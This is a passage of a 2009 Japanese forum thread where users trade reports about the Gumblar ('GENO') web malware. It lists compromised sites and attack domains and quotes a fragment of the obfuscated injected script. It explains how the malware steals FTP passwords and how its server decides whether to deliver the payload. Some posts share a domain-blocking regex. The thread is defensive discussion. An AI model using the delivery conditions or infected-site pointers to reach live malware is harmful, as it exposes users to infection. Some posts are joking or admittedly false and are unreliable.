314 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:21:03 ] パケモン感染しねえかな
315 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:21:41 ] 野球やろーぜ
316 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:21:46 ] エロマンガサイトで感染したのって出た?
317 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:22:13 ] >>302 釣り乙
318 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:22:19 ] 野球ch感染してるんじゃね?
319 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:22:21 ] >>316 またエロマンガ見てる・・・
320 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:22:39 ] そりゃウイルス作者だって書き込めるんだしチェックは絶対してるんだろうから 荒らしもするんじゃない?
321 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:23:21 ] >>164 正規サイトに感染広がる:新手のWebベースマルウェアが急拡大 - ITmedia エンタープライズ www.itmedia.co.jp/enterprise/articles/0905/15/news032.html これもGENOウィルスかな。
322 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:23:54 ] >>286 同人関係はネット上で規模のあるコミュニティを形成してるから 情報が伝わりやすいってのがあるんじゃないか?絶対数の差もあるんだろうけど。 いかにも一般人な人がやってるサイトだとそういう情報って伝播しにくいだろうな。 ここですらよく判ってない奴多すぎだし、IT情報に疎い種類の連中は大変だ。
323 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:24:28 ] 壺に入ってたら大騒ぎだろうな
324 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:24:31 ] >>221 >>1 のサイトとリンク先を参考にした現在の感染サイト スレで報告あったサイト含む 漏れがあったらレスよろ p-frying■com/ www■zengozen■co■jp/pic/keturosyumire-syonn■htm skyhighpremium■com/ sound■jp/yudai_marimba/ www■thesis-report■com/ www■joyjoynet■com/ www■ti-a-ra■com/ www1■odn■ne■jp/revue1999/ www■nifty-hair■com/ www■k-q-bury■com/ expss■main■jp/expss2/2005/01/ www■livmail■com/
325 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:24:50 ] 同人・ヲタ系以外で感染してる有名サイトってどこなんだ?
326 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:25:25 ] >>313 そうゆうことかありがとう、じゃあ自分のブログはFTP接続じゃないから大丈夫だな。
327 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:26:17 ] うぜええ
328 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:26:41 ] >>324 www■senlights■co■jp/seihin/kirenaru-1s■htm 俺はここから感染してるっぽい
329 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:27:19 ] >>298 2chと関わりのあるBIG-server.comが感染してた事例もあるからなあ ニコ動も無縁ではないかも 【BIG-server.com】maido3.comがウイルスにより改竄、ウイルススキャンのお願いとお詫び[05/11] gimpo.2ch.net/test/read.cgi/owabiplus/1242055283/
330 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:28:04 ] ふたば感染してるって全板感染してるの?
331 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:28:25 ] ウィルス、命名されたか。(多分)海外での感染源は、トラフィックの多いアダルトサイトか。 しかし、検出可否スレでも新種が見つかっているようだな・・・。
332 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:28:37 ] ふたばはガセじゃなかったか
333 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:29:13 ] 74 ヤマボウシ(dion軍) [sage] 2009/05/16(土) 22:01:12.03 ID:qgx0kH7v 【特徴】 ・亜種大杉 セキュリティソフトが対応しきれていない 症状もまちまちでいまいち決定打が無い ・ftpを介して感染者のサイトをゾンビ化 ・トラフィックが監視されてるから、ID・Passやクレカ番号が筒抜け Botnet汚染や、キャプチャ画像の送信の疑いと言う情報もあり ・クリーンインストールが唯一の対処法 ・キンタマなどとは違い感染源が明確なので、 感染源の企業などから圧力がかかってしまう。よってマスコミの報道も消極的
334 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:29:22 ] ソースチェッカーでなにも出ない場合は少しは安心してもいいんですかね
335 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:29:58 ] >>334 ユーザーエージェントみてるからSCOでも変えないとでない
336 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:30:26 ] ニュースサイトどっか取り上げてないのん
337 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:30:38 ] >>311 何度も出てるけどJavaScriptな
338 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 22:30:42 ] さっきエクスプローラーが異常終了してびびった。 cmdもregeditも起動するしsqlsodbc.chmも問題なかった。 怖いからwin7beta使うことにする。
339 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:31:22 ] avastでスキャンする場合圧縮ファイルもやったほうがいいの?
340 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:31:28 ] >>334 ソースの内容まで見ろよ 安全度100%でも感染してる
341 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:32:13 ] 2chが感染したら日本終わるな
342 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:33:29 ] 信じられるのは自分だけだってばっちゃが言ってた
343 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:34:02 ] >>294 714 名前:709[sage] 投稿日:2009/04/10(金) 00:33:30 >>713 >>709 は私だ(* >ω<)=3プー GENOウイルススレ 「1」だw
344 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:34:37 ] >>328 martuz.cnに飛ばされるね。 比較的最近感染したサイトのかもしれない。
345 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:36:20 ] >>344 へえそうなんだ 怖くて開けられないけど 親父がIE7でそこ閲覧した時に感染したっぽい
346 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:36:40 ] クリーンインスコしてもFTPのパス変えないと意味ないってさ また改竄されるらしい
347 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:37:00 ] >>326 FTPだけじゃないです
348 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:37:31 ] 知ってるから
349 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:37:45 ] ホラー映画作れそう
350 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:37:57 ] DLsite.comだけは 感染しませんように( -人-)
351 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:37:57 ] >>324 Firefoxでアクセスしてみたけど全部 martuz■cn/vid/?id= からファイルを取ろうとするね。それでそこに直接行っても // No news... と表示されるだけ。。IEじゃないとだめか・・
352 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:38:35 ] なんか話通じない人いるよね
353 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:39:02 ] >>347 FTPて何だか教えて下さい
354 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:39:41 ] 巨大ボットネット発見,190万台の感染マシンで構成 itpro.nikkeibp.co.jp/article/NEWS/20090423/329035/
355 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:40:15 ] よく分からんけど .cnを全部弾いたらおk?
356 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:40:31 ] スレの最初に書いてる以外の方法で感染確認する方法はない?
357 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:40:37 ] >>353 知らないなら気にしなくて良い
358 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:40:40 ] >>318 なん実Jにも広がってるなw ttp://baseball.fan-site.net/uhyo/tan/img/2694.jpg
359 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:40:40 ] ひどい広がり様
360 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:40:59 ] >>328 unescapeしてみたよ martuz.cn だってさ ホームページトップからして改ざんされとった こりゃパターンマッチむずいな... src=//mar"+"tux.cn/vid とかなってた。連結の位置ずらしただけでマッチしないよねぇ
361 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:41:16 ] 662 名前:GENO 報告 [sage] 投稿日:2009/05/16(土) 22:37:44 ID:5Y6mJ8vc0 商業乙女ゲー(PC)のリボンマジック公式サイト アクセスしようとするとGoogleにブロックされて下記のメッセージ >不正なソフトウェアは gumblar.cn/ を含む 1 個のドメインでホストされています。
362 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:42:04 ] 他人に感染させる経路はFTPだけ? フラッシュメモリからなら感染したPCからデータ受け取っても大丈夫?
363 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:42:16 ] >>354 さらに強まったのが出てきそうだな
364 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:43:06 ] >>361 また公式サイトが
365 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:43:52 ] >>344 4/29の正午ぐらいに閲覧した時に感染したかもしれん GENOの初出はいつだっけ
366 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:44:55 ] 感染してないけど何か不安だな サイト一旦閉じて沈静化待つべきか
367 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:45:06 ] しかし何でこんな急速に広まったんだ もう下火ってイメージだったのに
368 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:45:45 ] GENOはhostsで禁止してるからもう2度と見たい
369 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:45:46 ] 腐女子が騒いだ
370 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:45:48 ] なんか具体的な情報が今一つ分からんな。 Javascriptは只のダウンローダで、Adobe Reader、Flash Playerの脆弱性を突いて勝手にダウンロードするとかいう仕組み? 最近のサイト改ざんはMS鯖の脆弱性を突いてるのが多いが、同人サイトみたいなのがやられてるってのは、今回のは違うっぽいのか。
371 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:45:58 ] ニコ動とpixivと2chにかまけて自サイトずっと放置してて良かった
372 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:46:25 ] >>368 どっちだよw
373 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:46:41 ] >>367 GENOの対応 小遣いサイトや小林製薬など中年層が感染して気付かず放置
374 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:46:53 ] >>367 同人版の奴らが調べだしたから
375 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:46:53 ] >>370 そうだけど、ftpからの改竄は別物だよ
376 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:46:59 ] >>365 GENOで感染、で騒がれ始めたのは確か4月5日あたり 実際には3月28日頃からポツポツとあったらしい
377 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:47:45 ] 初期に感染してた奴らは何見て感染したんだか
378 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:48:24 ] GENO
379 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:48:46 ] >>365 326 名前:名無しさん[sage] 投稿日:2009/04/04(土) 10:43:40 0 GENOのHPにアクセスしようとしたら、Acrobat Plug-in が起動して This operation is not allowed. と表示する。 2台試して、2台とも起きた。 もしかしてウィルスに感染してる? これが最初
380 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:48:50 ] GENO先生
381 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:49:08 ] >>379 それ違う 深夜3時くらいのがあったはず
382 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:49:12 ] >>370 傍受したFTP接続情報を元に普通に接続して改ざんするからね。 サーバーのOSは関係無いよ。 逆に言えば感染後にFTPで通信していなければ、FTP接続情報は漏れない。
383 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:49:15 ] GENOがもっとウィルスについて説明していれば良かったのに
384 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:50:22 ] >>368 はっきりしなさい!
385 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:50:37 ] >>376 あーほんとだ 最近なんだ ありがとう
386 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:50:44 ] GENOのキャッシュ消せばダイジョブって説明を鵜呑みにしてました!><;
387 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:51:28 ] いいから黙ってキャッシュ消せよ
388 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:51:33 ] avast使ってれば問題ないってことか?
389 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:51:50 ] GENO体質
390 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:51:59 ] 林明美のHP踏むとavast反応するらしいけどアドレスが分からぬ
391 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 22:52:09 ] 俺は今日はじめて知ったけど、けっこう前から出回ってたんだね。 じゃあ、なぜ俺様の購入した優秀なノートン様が未対応なんだ? それとも闘ってくれてるのか?
392 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:52:23 ] もう感染報告から一カ月以上たつのに いまだに対策されてないサイトがこんなにあるんだな
393 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:52:26 ] >>375 >>382 ありがトン 感染後にFTPのパスを盗むんだな。その後鯖に勝手にアクセスしてソース改ざんかw 凝ってるなあ。 仮にこのパターンばっかりだったらFTPへのアクセスログでも見とけば良いのか。 最近のウィルスはチェックソフトで見つからない奴が多くて怖いよ・・・。
394 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:52:31 ] Avastのサイトでウイルスクリーナーダウンロードしてみたんだけど いざ検索を開始すると「ファイルが検索できません!」て表示が出る なぜ??
395 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:52:48 ] >>391 ノートンは今俺の膝枕で寝ている
396 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:53:02 ] GENOギアス
397 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:53:38 ] cmd.exeでsqlsodbc.chmの容量確認したら0になってた おかしいと思いつづ直接探しにいったら見つけられない、ファイル消えてる臭い 1時間前までは普通に確認できたんだけど何なんだろうなこれ。カスペルは問題なく当てられる カスペルで変なもん引っかかったら報告しに来るよ
398 名前:362 mailto:sage [2009/05/16(土) 22:54:38 ] FTP以外で感染するかわかる人、いませんかー?
399 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:54:44 ] ところで、今のところ感染経路はAdobeのPDFかFlashの脆弱性をついたバイナリ実行によるものと認識しているんだが、 今感染してる連中ってのは、4月初めのGENO騒動のときに、FlashもReaderもUpdateしてなかった連中ってことか? それとも何か別の感染経路があるのか?
400 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:54:58 ] GENOが潰れるなりしてくれたら 気分的にはすっきりするんだけどなあ
401 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:55:08 ] 同人板のスレってアニメキャラ板とかのスレにも貼られてるんだな。 道理で馬鹿の他に初心者以下のカスがいるはずだ
402 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:55:11 ] >>324 を検知するアンチウイルスソフトまとめて
403 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:55:47 ] >>351 ほんとだ… 以前チェックした時はgumblar.cnを読み込んでるサイトがほとんどだったんだが 恐らくリモートから攻撃コードを更新されたんだと思う ちなみに直接ロケーションバーにmartuz■cn〜を打ち込んでも 攻撃コードはダウンロードされないよ。 攻撃サーバはUA、IPアドレス、cookie、リファラを駆使して解析から逃れようと試みる。 攻撃コードをダウンロードするには ・ロケーションバーにURLを打ち込んでアクセスするのではなく、感染サイトからアクセスする。またはリファラを偽装する ・cookieを拒否する ・XP以下のWindowsでアクセスする。またはUAを偽装する ・もし以前に攻撃サイトにアクセスしたことがあり、その際「XP以下のWindows以外」でアクセスしていた場合はIPアドレスを変える 以上の条件を満たすことが必要
404 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:55:52 ] FC2でサイト作ってる人はどうなんだろうかね(´・ω・`)
405 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:56:25 ] >>397 気になる 検索終わったら頼むな
406 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:56:32 ] ジーノってなんなの? 昔やったマリオRPGのイメージしか思い出せん
407 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:56:42 ] >>390 replica08.web.fc2.com/index.html 多分これじゃないか
408 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:56:44 ] >>391 ノートン先生は俺のをなめてるよ
409 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:56:46 ] >>399 前者。だが前とはコードも飛ばし先も変わってる。
410 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:57:01 ] いつも仮想PC上からサイト更新してるんだけど、もしホストPCが感染していたら 仮想PCからのFTPも危険?
411 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:57:06 ] 9.11でもダメって聞いたけどデマなの?
412 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:57:37 ] XPgenocideウイルスだなこりゃ
413 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:57:43 ] >>410 アウト
414 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:58:06 ] リーダーは削除した方がいい
415 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:58:06 ] >>410 多くの場合セーフ
416 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:58:32 ] >>413 ありがと、しばらく更新見送る
417 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:58:48 ] >>410 ホストならアウト
418 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:58:56 ] >>410 え?じゃあ単純にアップデートしてないからこうなったの? もっとも亜種が広がればどうなるかは知らないが、拡散したやつはそこを突いてるやつだったわけか?
419 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:59:18 ] >>414 脆弱性のアップ来てるから削除する必要なし
420 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:59:33 ] >>410 セーフ
421 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:59:40 ] アドビリーダーって消して大丈夫なのか
422 名前:418 mailto:sage [2009/05/16(土) 22:59:49 ] ×>>410 ○>>409 ごめん安価間違えた
423 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:00:12 ] >>388 いいえ
424 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:00:16 ] >>410 セフト
425 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:00:17 ] FlashもReaderもアップデートしてない人が多いんじゃない してなくても余程古くない限りそれといった支障ないし
426 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:00:39 ] >>421 PDF読むのならもっと良いソフトもあるから
427 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:00:40 ] いらないっちゃいらない いるっちゃいる
428 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:00:41 ] >>409 d、つまりサイト閲覧者の立場から見た場合、4月騒動の時点で感染経路を塞ごうと思えばいくらでも塞げたって事だな
429 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:01:14 ] あ、セーフっぽいのか どちらにしろしばらく控えるけど
430 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:01:20 ] >>425 6.0からアップデートしてなかった。 慌ててやったよ。
431 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:01:19 ] リーダーが対応したのは何日か前の更新じゃないの?
432 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:01:24 ] >>398 いまのところそういうのはない 別のウイルスに感染してなきゃ大丈夫じゃね ただし今のところなだけで今後どうなるかは不明
433 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:02:21 ] >>431 それとは別
434 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:02:26 ] もし感染したらってはなしなんだけど 自分が作成したHPみたらavastは警告出す?
435 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:03:16 ] >>428 adobeがセキュリティー対応したのは昨日か一昨日ぐらいじゃなかったか?
436 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:03:37 ] GENOウイルスに感染したclientがftp使われてjsうpするわけじゃないから
437 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:03:39 ] >>434 やつは進化するから確信はないだろ
438 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:03:41 ] >>426 pdfってAdobe以外でも読めたの!?
439 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:04:09 ] >>437 今のところはわかるってことですか?
440 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:04:13 ] >>435 それとは別です
441 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:04:27 ] >>438 情報弱者ってかわいそうだな
442 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:04:42 ] >>435 いや、もっと前に脆弱性の更新はあったよ 最近のはまた別
443 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:04:53 ] >>407 うちのAviraたんは反応してくれないがちゃんと攻撃コードは埋め込まれてるね ttp://www.dotup.org/uploda/www.dotup.org34438.png
444 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:05:03 ] 質問きたら 「亜種が出てくるかもしれないからそれはわからん」って感じのレスしかできないよね
445 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:05:19 ] (1)感染してるサイトを閲覧する (2)自分のパソコンが感染する (3)その状態でFTPで自分のサイトを更新する (4)その時にFTPのIDとパスを抜かれる (5)ウイルスが勝手にHTML、phpファイル等に不正なジャバスクリプトを埋め込む (6)サイトが感染状態になる。 (7)そのサイトを見た人が感染する 1) どっかの感染している index.html やら index.php やらを持ったサイトを、 自分のサイトのコンテンツを FTP で更新する担当の人がアクセスする 2) 担当の人の PC にトロイが侵入する 3) 2) で侵入したトロイは、担当の人が FTP で 自分のサイトにアクセスするのを待ち続ける 4) 担当の人が感染した PC から FTP で自分のサイトを更新すると、 トロイがその様子をチェックしていて、そのサイトにアクセスした ログイン名とパスワードを盗み取る 5) トロイはしばらくすると自動的に、4) で盗んだパスワードを使って そのサイトにアクセスし、index.html やら index.php やらをこっそり書き換えて、 そのサイトに感染コードを仕込む 5') もしうまく作ってあるトロイなら、ローカルの PC にある 自分のサイトに上げるためのファイルのローカルコピーにも、 同じ感染コードを仕込むだろう。 6) 1) に戻る
446 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:05:39 ] .cnドメイン全部塞いでればまだマシなのかもしれんな
447 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:07:20 ] スレざっと見た感じだと Adobe製品さえ一切使わなければ感染は絶対にしないのか?
448 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:07:22 ] >>443 俺もavira 反応しないねぇ javascriptOffだとだめみたい Onにして配布元のpdfやらフラッシュをgetするところまでいくと 反応するんだろうか ってかcnとkrを全ブロックてすごいなあんたw
449 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:07:23 ] www.i-like-movie.com/ 感染してる
450 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:07:32 ] >>443 敵もavastやchromeなどで対策を講じているようだ もうノートンやバスタークラスでは検知できないな
451 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:07:35 ] 自分のサイトが感染してるかどうかはソース見たらわかるんだよね?
452 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:08:08 ] >>17 Aを試して50,727バイトだった安心していいよな? でも亜種多すぎてもう訳ワカンネ cmd.exe開けても感染してるくらいだから、Aも既に破られてんじゃね
453 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:08:17 ] >>449 してるなら踏ませないようにしろよ
454 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:08:23 ] >>444 現時点で既存亜種含めたウイルスの挙動を完全に解析した奴はいないっぽいからな。 突然HDD全消去するとかなにかの隠し機能がまだあるかもしれない。
455 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:08:41 ] >>447 使ってなくても古いのがインストールされてれば危ない FlashPlayerなしっていうのはあんまりない状況だと思う
456 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:09:10 ] >>449 マジか?! ここ閲覧者莫大じゃないの?
457 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:09:32 ] まぁ今の現状を見て書き込みすりゃいいよ 未来のことなんてわからんし
458 名前:449 mailto:sage [2009/05/16(土) 23:09:43 ] ごめん、嘘ぴょん
459 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:09:49 ] なんで感染してるのを貼るんだ
460 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:09:58 ] キーロガー使って個人情報を収集して送信するようなウィルスでもHDDを全部飛ばしたりするのか?
461 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:10:02 ] >>458 市ね
462 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:10:17 ] >>452 更新日時が今年の3月以降ならアウトという話も聞いた
463 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:11:31 ] *.*\ (cn|kr)/.*$/ 採用
464 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:11:47 ] こんな状況で嘘はやめろよな、情報信じれなくなるじゃんか
465 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:11:50 ] >>460 ウイルス作ってる奴の気まぐれでそういうやり方に切り替えたりするかもね。 続々と亜種が出てるなら複数人でやってる可能性もあるし、 その中に紛れてる協調性の無い馬鹿がやらかしたりするかも・
466 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:12:00 ] Adobe Flashなんたらを消せばいいの?
467 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:12:16 ] >>449 C:\にアクセスするimg要素が有るけど感染してないのかなんだ。
468 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:12:47 ] >>462 五年前だ よかった
469 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:13:00 ] 大問題だと思うんだがまったく報道されてないのはなぜよ
470 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:13:00 ] >>451 多分 今の状態で言うと
471 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:13:03 ] >>466 いい加減巣に帰れよ
472 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:13:09 ] >>466 アップデートすれば良いだけだ
473 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 23:13:37 ] フレッツウイルスクリアさんは何もしてくれないのか
474 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:14:12 ] 巣に帰れとかいい加減お前がうぜーよ
475 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:14:22 ] UAをVISTAのバージョンにしたら回避できる?
476 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:14:22 ] これって、ウィジェット経由でも感染するの?
477 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:14:43 ] Flashとかいらないんじゃない? 無駄に凝ってて面倒臭いサイトが増えていくだけだわ
478 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:15:18 ] Mozilla Firefox opera 使えば何て事は無いのに・・・。
479 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:15:31 ] >>463 /^.*\. (cn|kr)/.*$/ ね
480 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:15:37 ] >>458 風雪のルルで逮捕
481 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 23:15:48 ] ブラウザ関係なくね?
482 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:15:59 ] 疑心暗鬼になってしまうな
483 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:16:04 ] >>460 最近はビジネス目的だからそういうのは少ない
